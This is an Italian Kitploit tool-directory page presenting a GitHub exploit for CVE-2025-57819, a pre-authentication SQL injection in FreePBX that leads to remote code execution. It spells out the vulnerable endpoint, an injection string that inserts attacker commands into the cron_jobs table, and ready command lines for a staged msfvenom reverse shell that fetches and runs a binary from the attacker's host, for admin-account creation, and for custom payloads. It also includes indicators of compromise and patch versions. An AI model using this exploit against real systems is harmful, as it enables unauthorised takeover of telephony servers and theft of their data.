Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-57819-exploit — FreePBX SQLi pre-autenticazione a RCE (CVE-2025-57819) — Exploit all-in-one | Kitploit
Strumenti/GitHubGitHub/jeanback1/cve-2025-57819-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubjeanback1/cve-2025-57819-exploit

CVE-2025-57819-exploit

FreePBX SQLi pre-autenticazione a RCE (CVE-2025-57819) — Exploit all-in-one

Vedi Repository
213 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-57819 — Da SQLi Pre-Auth di FreePBX a RCE

Un exploit all-in-one per CVE-2025-57819, un'iniezione SQL non autenticata nel modulo endpoint di FreePBX che porta all'esecuzione remota di codice tramite l'iniezione di job cron.

  • CVSS: 9.8 (Critico) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CISA KEV: Aggiunto il 29 agosto 2025
  • Versioni vulnerabili: Sangoma FreePBX 15, 16, 17 con modulo endpoint < 15.0.66 / < 16.0.89 / < 17.0.3
  • Patch disponibile in: endpoint 15.0.66, 16.0.89, 17.0.3

Riepilogo della vulnerabilità

FreePBX espone l'endpoint admin/ajax.php?module=FreePBX\modules\endpoint\ajax senza richiedere autenticazione (CWE-288). Il parametro brand viene passato direttamente nelle query SQL senza sanitizzazione (CWE-89), consentendo a un attaccante di iniettare istruzioni SQL arbitrarie nel database asterisk.

Catena d'attacco

root@kitploit:~
[Unauthenticated HTTP request]
        │
        ▼
admin/ajax.php?module=FreePBX\...\ajax&command=model&brand=<SQLi>
        │
        ▼
SQL Injection into `cron_jobs` table
(INSERT with attacker-controlled command, schedule="* * * * *")
        │
        ▼
Within ~60 seconds, the cron daemon executes the command as the `asterisk` user
        │
        ▼
Remote Code Execution

Funzionalità dell'exploit

Questo exploit supporta tre modalità:

1. Reverse Shell Staged (predefinita)

  1. Genera un binario linux/x64/shell_reverse_tcp tramite msfvenom
  2. Avvia un server HTTP per servire il binario
  3. Avvia un listener TCP per la shell
  4. Inietta un job cron tramite SQLi che scarica ed esegue il binario
  5. Quando il cron scatta, ottieni una shell interattiva
  6. Rimuove il job cron iniettato all'uscita
root@kitploit:~
python3 cve_2025_57819_aio.py <target_url> <lhost> <lport>

Esempio:

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452

Questo exploit usa la porta 4452 per la reverse shell e la 4453 per il server HTTP di staging.

2. Creazione utente admin (--create-user)

Crea un nuovo account amministratore FreePBX tramite SQLi. Nessuna reverse shell, nessun reachback, nessun binario richiesto.

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal --create-user

3. Payload personalizzato (--payload <path>)

Usa il tuo binario ELF invece di generarne uno con msfvenom.

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452 \
    --payload /path/to/custom_shell.elf

Requisiti

  • Python 3.6+
  • Libreria requests (pip install requests)
  • Per la modalità staged: Metasploit (msfvenom) oppure un payload personalizzato con --payload
  • Per la modalità --create-user: Nient'altro oltre a Python + requests

Come funziona

Vettore di iniezione SQL

L'endpoint vulnerabile è:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=XXX&model=XXX&brand=<SQLi>

Il parametro brand viene concatenato in un INSERT SQL senza sanitizzazione. L'exploit costruisce l'iniezione come:

root@kitploit:~
';INSERT INTO cron_jobs (modulename,jobname,command,...) VALUES ('X','Y','<CMD>',NULL,'* * * * *',30,1,1) --

Il -- finale trasforma in commento il resto della query originale.

Esecuzione cron

FreePBX usa il sottosistema cron di Asterisk. I job cron vengono controllati ogni minuto. Quando la pianificazione (* * * * *) del job inserito corrisponde, il comando viene eseguito come utente di sistema asterisk.

Pulizia

Al termine della sessione (o in caso di timeout), l'exploit invia una SQLi DELETE per rimuovere il job cron iniettato da cron_jobs.

Indicatori di compromissione

  • Voci inattese in asterisk.cron_jobs con nomi di modulo/job casuali
  • Richieste HTTP in uscita dal server FreePBX verso IP esterni su porte alte
  • Connessioni reverse shell dall'utente asterisk
  • Nuovi account amministratore casuali in ampusers (se si usa la modalità --create-user)

Mitigazione

Aggiorna il modulo endpoint alle versioni corrette:

  • 15: >= 15.0.66
  • 16: >= 16.0.89
  • 17: >= 17.0.3

Riferimenti

  • NVD — CVE-2025-57819
  • GitHub Security Advisory — GHSA-m42g-xg4c-5f3h
  • CISA Known Exploited Vulnerabilities
  • watchTowr Labs
  • FreePBX Community Advisory

Disclaimer

Questo software è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai il permesso esplicito di testare è illegale. L'autore non è responsabile per qualsiasi uso improprio.

Scarica lo strumento